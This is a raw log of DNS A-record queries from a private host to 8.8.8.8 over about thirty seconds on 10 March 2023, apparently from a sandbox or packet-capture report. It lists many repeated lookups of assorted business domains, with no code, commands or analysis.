                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.946753025 CET192.168.2.68.8.8.80x101eStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:30.958574057 CET192.168.2.68.8.8.80xd7b0Standard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:32.514404058 CET192.168.2.68.8.8.80x43ddStandard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:33.063333988 CET192.168.2.68.8.8.80x52b9Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.643397093 CET192.168.2.68.8.8.80x67f0Standard query (0)www.baijaku.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.645756006 CET192.168.2.68.8.8.80xb019Standard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.655388117 CET192.168.2.68.8.8.80xbbc9Standard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.686045885 CET192.168.2.68.8.8.80xe7efStandard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.691236019 CET192.168.2.68.8.8.80xfd4fStandard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.714828014 CET192.168.2.68.8.8.80x366Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.717236042 CET192.168.2.68.8.8.80x1fc4Standard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.722549915 CET192.168.2.68.8.8.80xd702Standard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.725997925 CET192.168.2.68.8.8.80x2693Standard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:35.731173992 CET192.168.2.68.8.8.80xd41eStandard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.239726067 CET192.168.2.68.8.8.80xf959Standard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.284784079 CET192.168.2.68.8.8.80x203eStandard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.289432049 CET192.168.2.68.8.8.80x7bd1Standard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.381125927 CET192.168.2.68.8.8.80xf416Standard query (0)www.item-pr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.406831026 CET192.168.2.68.8.8.80x56afStandard query (0)www.valdal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.667839050 CET192.168.2.68.8.8.80xa623Standard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:36.717858076 CET192.168.2.68.8.8.80x534fStandard query (0)www.depalo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.089390993 CET192.168.2.68.8.8.80xefc2Standard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.435693979 CET192.168.2.68.8.8.80x754Standard query (0)www.credo.edu.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.437325001 CET192.168.2.68.8.8.80x2078Standard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.520385981 CET192.168.2.68.8.8.80xf7e8Standard query (0)www.nunomira.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.521410942 CET192.168.2.68.8.8.80x867bStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.523354053 CET192.168.2.68.8.8.80xaa73Standard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.535753012 CET192.168.2.68.8.8.80xf6d2Standard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.536154985 CET192.168.2.68.8.8.80xb814Standard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:37.537249088 CET192.168.2.68.8.8.80xb3c3Standard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.209804058 CET192.168.2.68.8.8.80x16c7Standard query (0)www.abart.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.276776075 CET192.168.2.68.8.8.80x20e4Standard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.352308035 CET192.168.2.68.8.8.80xcbeeStandard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.353849888 CET192.168.2.68.8.8.80x6b88Standard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.375659943 CET192.168.2.68.8.8.80x7a37Standard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.375991106 CET192.168.2.68.8.8.80x34a4Standard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:38.873534918 CET192.168.2.68.8.8.80x3036Standard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.298120975 CET192.168.2.68.8.8.80x3fd6Standard query (0)www.jroy.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.529352903 CET192.168.2.68.8.8.80x38a1Standard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.529352903 CET192.168.2.68.8.8.80x8801Standard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.561207056 CET192.168.2.68.8.8.80x8469Standard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.562917948 CET192.168.2.68.8.8.80x5835Standard query (0)www.hummer.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.646363974 CET192.168.2.68.8.8.80xa6c7Standard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.650424004 CET192.168.2.68.8.8.80x3ce7Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.650530100 CET192.168.2.68.8.8.80xfe3cStandard query (0)www.vexcom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.720172882 CET192.168.2.68.8.8.80x2618Standard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:39.720302105 CET192.168.2.68.8.8.80x3785Standard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.282409906 CET192.168.2.68.8.8.80xd67fStandard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.288836002 CET192.168.2.68.8.8.80x4482Standard query (0)www.sjbs.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.288925886 CET192.168.2.68.8.8.80xd008Standard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.299140930 CET192.168.2.68.8.8.80xeec4Standard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.308269978 CET192.168.2.68.8.8.80x8062Standard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.650160074 CET192.168.2.68.8.8.80x7d4Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.652592897 CET192.168.2.68.8.8.80x62e6Standard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:40.793246984 CET192.168.2.68.8.8.80xcf1cStandard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:41.528527975 CET192.168.2.68.8.8.80x941aStandard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:41.529534101 CET192.168.2.68.8.8.80xda8bStandard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:41.610492945 CET192.168.2.68.8.8.80x21feStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:41.610533953 CET192.168.2.68.8.8.80x63b0Standard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:41.626566887 CET192.168.2.68.8.8.80x9ba5Standard query (0)www.maktraxx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:41.662336111 CET192.168.2.68.8.8.80x9f25Standard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:41.819132090 CET192.168.2.68.8.8.80xcf1cStandard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:41.948035002 CET192.168.2.68.8.8.80x437aStandard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:42.048820972 CET192.168.2.68.8.8.80xf502Standard query (0)www.fink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:42.048891068 CET192.168.2.68.8.8.80xf14aStandard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:42.072809935 CET192.168.2.68.8.8.80xbce5Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:42.084037066 CET192.168.2.68.8.8.80xe2d2Standard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:42.162729025 CET192.168.2.68.8.8.80x2e71Standard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:42.460520983 CET192.168.2.68.8.8.80xdcd9Standard query (0)www.cel-cpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:42.465364933 CET192.168.2.68.8.8.80x3388Standard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:43.626678944 CET192.168.2.68.8.8.80xcf1cStandard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:46.532322884 CET192.168.2.68.8.8.80xf66aStandard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:46.538249969 CET192.168.2.68.8.8.80xa7d2Standard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:46.539433956 CET192.168.2.68.8.8.80xcb76Standard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:46.539572001 CET192.168.2.68.8.8.80x48dStandard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:47.116689920 CET192.168.2.68.8.8.80x30f0Standard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:47.183621883 CET192.168.2.68.8.8.80x18e7Standard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:47.202034950 CET192.168.2.68.8.8.80x402dStandard query (0)www.fe-bauer.deA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:47.204111099 CET192.168.2.68.8.8.80xb438Standard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:47.880608082 CET192.168.2.68.8.8.80xa017Standard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:47.880968094 CET192.168.2.68.8.8.80xea7fStandard query (0)www.koz1.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:48.093194962 CET192.168.2.68.8.8.80x178cStandard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:48.093465090 CET192.168.2.68.8.8.80x4925Standard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:48.157207012 CET192.168.2.68.8.8.80xd6e0Standard query (0)www.kernsafe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:48.972970009 CET192.168.2.68.8.8.80x1728Standard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:48.980557919 CET192.168.2.68.8.8.80x2a58Standard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.223362923 CET192.168.2.68.8.8.80x6c97Standard query (0)www.jenco.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.228657007 CET192.168.2.68.8.8.80x80dStandard query (0)www.fnw.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.244136095 CET192.168.2.68.8.8.80xd11Standard query (0)www.dgmna.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.249738932 CET192.168.2.68.8.8.80x63b3Standard query (0)www.pdqhomes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.259345055 CET192.168.2.68.8.8.80xa73aStandard query (0)www.pr-park.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.261854887 CET192.168.2.68.8.8.80xdef0Standard query (0)www.ftchat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.268717051 CET192.168.2.68.8.8.80x6e6dStandard query (0)www.olras.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.279305935 CET192.168.2.68.8.8.80x430aStandard query (0)www.quadlock.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.283001900 CET192.168.2.68.8.8.80x39f5Standard query (0)www.wkhk.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.287772894 CET192.168.2.68.8.8.80x8cffStandard query (0)www.baijaku.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.590528965 CET192.168.2.68.8.8.80xdfa6Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.595143080 CET192.168.2.68.8.8.80x1032Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.618937969 CET192.168.2.68.8.8.80xc0abStandard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:49.949709892 CET192.168.2.68.8.8.80x2ee9Standard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.076314926 CET192.168.2.68.8.8.80x9137Standard query (0)www.rs-ag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.077153921 CET192.168.2.68.8.8.80xfa0eStandard query (0)www.mqs.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.088640928 CET192.168.2.68.8.8.80xf4acStandard query (0)www.alteor.clA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.155633926 CET192.168.2.68.8.8.80xc28dStandard query (0)www.valdal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.156183958 CET192.168.2.68.8.8.80xbdcStandard query (0)www.item-pr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.674010992 CET192.168.2.68.8.8.80x1b03Standard query (0)www.depalo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.686199903 CET192.168.2.68.8.8.80x57abStandard query (0)www.vazir.seA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.722013950 CET192.168.2.68.8.8.80xf4acStandard query (0)www.credo.edu.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.724082947 CET192.168.2.68.8.8.80x2d8cStandard query (0)www.owsports.caA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.733222961 CET192.168.2.68.8.8.80xa8fbStandard query (0)www.petsfan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:50.737694979 CET192.168.2.68.8.8.80x729dStandard query (0)www.elpro.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:51.110269070 CET192.168.2.68.8.8.80xa454Standard query (0)www.abart.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:51.157557011 CET192.168.2.68.8.8.80x10cdStandard query (0)www.tvtools.fiA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:51.169135094 CET192.168.2.68.8.8.80xb6e2Standard query (0)www.otena.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:51.169225931 CET192.168.2.68.8.8.80x9fdeStandard query (0)www.transsib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:51.172718048 CET192.168.2.68.8.8.80xdebcStandard query (0)www.iamdirt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.016619921 CET192.168.2.68.8.8.80xb6feStandard query (0)www.ora.ecnet.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.027856112 CET192.168.2.68.8.8.80xcc73Standard query (0)www.evcpa.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.033266068 CET192.168.2.68.8.8.80xce55Standard query (0)www.t-tre.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.096785069 CET192.168.2.68.8.8.80x7ee7Standard query (0)www.abdg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.097327948 CET192.168.2.68.8.8.80xedStandard query (0)www.naoi-a.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.100577116 CET192.168.2.68.8.8.80x5698Standard query (0)www.wifi4all.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.101989985 CET192.168.2.68.8.8.80xb072Standard query (0)www.hummer.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.104206085 CET192.168.2.68.8.8.80xf7feStandard query (0)www.nelipak.nlA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.732111931 CET192.168.2.68.8.8.80x192bStandard query (0)www.xaicom.esA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.732862949 CET192.168.2.68.8.8.80xdd30Standard query (0)www.fcwcvt.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.978470087 CET192.168.2.68.8.8.80xdb37Standard query (0)www.cokocoko.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.980012894 CET192.168.2.68.8.8.80x5faeStandard query (0)www.edimart.huA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.980077982 CET192.168.2.68.8.8.80x2337Standard query (0)www.synetik.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:52.986753941 CET192.168.2.68.8.8.80x758Standard query (0)www.waldi.plA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.469501019 CET192.168.2.68.8.8.80xb1acStandard query (0)www.aevga.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.472805023 CET192.168.2.68.8.8.80x70f3Standard query (0)www.gpthink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.776205063 CET192.168.2.68.8.8.80xe2d1Standard query (0)www.holleman.usA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.776824951 CET192.168.2.68.8.8.80x93aaStandard query (0)www.udesign.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.779570103 CET192.168.2.68.8.8.80x4126Standard query (0)www.pcgrate.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.784408092 CET192.168.2.68.8.8.80xab74Standard query (0)www.snugpak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:53.890980005 CET192.168.2.68.8.8.80x69b6Standard query (0)www.jacomfg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.148147106 CET192.168.2.68.8.8.80x3b88Standard query (0)www.ottospm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.278839111 CET192.168.2.68.8.8.80x817fStandard query (0)www.kernsafe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.401505947 CET192.168.2.68.8.8.80x452dStandard query (0)www.netcr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.403479099 CET192.168.2.68.8.8.80xef10Standard query (0)www.photo4b.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.405518055 CET192.168.2.68.8.8.80x35e0Standard query (0)www.speelhal.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:54.436193943 CET192.168.2.68.8.8.80x4e84Standard query (0)www.stnic.co.ukA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.075009108 CET192.168.2.68.8.8.80x983fStandard query (0)www.findbc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.075750113 CET192.168.2.68.8.8.80x17c9Standard query (0)www.crcsi.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.077222109 CET192.168.2.68.8.8.80x7a3cStandard query (0)www.jchysk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.171896935 CET192.168.2.68.8.8.80x8e06Standard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.192749977 CET192.168.2.68.8.8.80xb22cStandard query (0)www.fink.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.201132059 CET192.168.2.68.8.8.80x557Standard query (0)www.medisa.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.311575890 CET192.168.2.68.8.8.80xdd17Standard query (0)www.mobilnic.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.742285013 CET192.168.2.68.8.8.80x1f85Standard query (0)www.railbook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.937973022 CET192.168.2.68.8.8.80x9dffStandard query (0)www.ora-ito.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.938527107 CET192.168.2.68.8.8.80x3fafStandard query (0)www.lrsuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.940484047 CET192.168.2.68.8.8.80xf34fStandard query (0)www.kernsafe.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:55.947565079 CET192.168.2.68.8.8.80xb56Standard query (0)www.c9dd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:56.744755030 CET192.168.2.68.8.8.80xf56eStandard query (0)www.domon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:56.745033979 CET192.168.2.68.8.8.80x72aeStandard query (0)www.dayvo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:56.747283936 CET192.168.2.68.8.8.80x7670Standard query (0)www.usadig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:56.749212027 CET192.168.2.68.8.8.80xa152Standard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:57.106106997 CET192.168.2.68.8.8.80x7a88Standard query (0)www.medius.siA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:57.350326061 CET192.168.2.68.8.8.80x86b0Standard query (0)www.stajum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:57.435151100 CET192.168.2.68.8.8.80xd7a1Standard query (0)www.pwd.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:57.464550018 CET192.168.2.68.8.8.80x58dfStandard query (0)www.ex-olive.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:57.474638939 CET192.168.2.68.8.8.80x54d3Standard query (0)www.pupi.czA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:57.507889986 CET192.168.2.68.8.8.80x133aStandard query (0)www.ka-mo-me.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:57.749114990 CET192.168.2.68.8.8.80xa152Standard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:58.789458990 CET192.168.2.68.8.8.80xa152Standard query (0)www.nqks.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:58.918140888 CET192.168.2.68.8.8.80x7c4bStandard query (0)www.com-sit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.269501925 CET192.168.2.68.8.8.80x6145Standard query (0)www.myropcb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:54:59.466079950 CET192.168.2.68.8.8.80xcad5Standard query (0)www.reglera.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.400537968 CET192.168.2.68.8.8.80xb27eStandard query (0)www.yoruksut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Mar 10, 2023 07:55:00.783056974 CET192.168.2.68.8.8.80x66ceStandard query (0)www.wnsavoy.comA (IP address)IN (0x0001)false
